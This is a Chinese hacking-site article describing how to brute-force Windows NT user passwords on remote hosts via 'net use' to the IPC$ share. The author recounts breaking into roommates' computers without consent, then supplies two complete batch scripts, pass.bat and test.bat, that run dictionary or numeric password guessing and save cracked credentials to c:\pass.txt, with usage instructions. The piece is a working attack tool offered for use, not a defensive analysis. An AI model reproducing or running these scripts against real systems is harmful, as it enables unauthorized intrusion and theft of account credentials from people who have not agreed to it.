如知道一个NT帐户与密码,就可以用
net use \\主机\ipc$Content$nbsp;"密码" /user:"用户"
与远程主机建立连接,这是每一个Hacker或是梦想成为又或是正在努力成为Hacker的朋友都知道的方法,甚至连我这个连菜鸟都算不上的小鸟都知道,我也仅仅知道这一条,我就用我仅仅知道的这一条在宿舍网里进入别人的电脑,因为他们的电脑密码都为空,被他们发现了之后狠K了一顿,然后纷纷加上了密码,这下可没戏了,想去偷窥他们的密码他们又防范得紧,只得想其他办法,也许各位大虾们就会利用其他方法,诸如寻找系统之类得到管理权限,而我不行,因为我前面说过,我只会那一条,那又会有人说用软件暴力破解密码就可以了,也许不错,但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法,却在无意间看DOS帮助时发现了一些命令,当真是天无绝人之路:
1、字典:for /f %i in (字典文件) do net use \\主机\ipc$Content$nbsp;"%i" /user:"用户"
2、数字:for /l %i in (start,step,end) do net use \\主机\ipc$Content$nbsp;"%i" /user:"用户"
以上可参看DOS里面for帮助,还别说,真让我给连上几台机子,可问题也随之而来,连是连上了,我仍然不知道密码,下次要用还得重新全部试过。 正失望,无意间又发现了一个好方法,也许是我太笨,也许你们更聪明,,说不定你们早已经发现了,不再说废话,下面就将方法全部给出,请各位大虾指正: 将下面文件存为pass.bat: @echo off
echo ------------------------------------------------------------------- >>c:\pass.txt
echo ------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo 破解结果: >>c:\pass.txt
if "%6"=="1" goto sh*t2
:sh*t1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:sh*t2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit 将下面文件存为test.bat: net use \\%1\ipc$Content$nbsp;%2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令执行返回结果,net use成功返回0,失败返回2
:answer0
echo 远程主机:"%1" >>c:\pass.txt
echo 用 户:"%3" >>c:\pass.txt
echo 密 码:%2 >>c:\pass.txt
net use \\%1\ipc$Content$nbsp;/delet
exit
:answer2 将pass.bat与test.bat存放于system32中,用法如下:
1、如果用字典破解:pass.bat 字典文件路径及名称 主机 用户名
2、如果用数字破解:pass.bat 起始数 步长 结束数 主机 用户名 1
密码破解出来之后,存放于c:\pass.txt文件里面。
另外,我做的这些只是在局域网内测试,如果远程测试,受网速限制,具体情况只能靠自己去摸索.
本文由 华域联盟 原创撰写:华域联盟 » 用Dos命令解开远程NT服务器用户密码
转载请保留出处和原文链接:https://www.cnhackhy.com/127875.htm
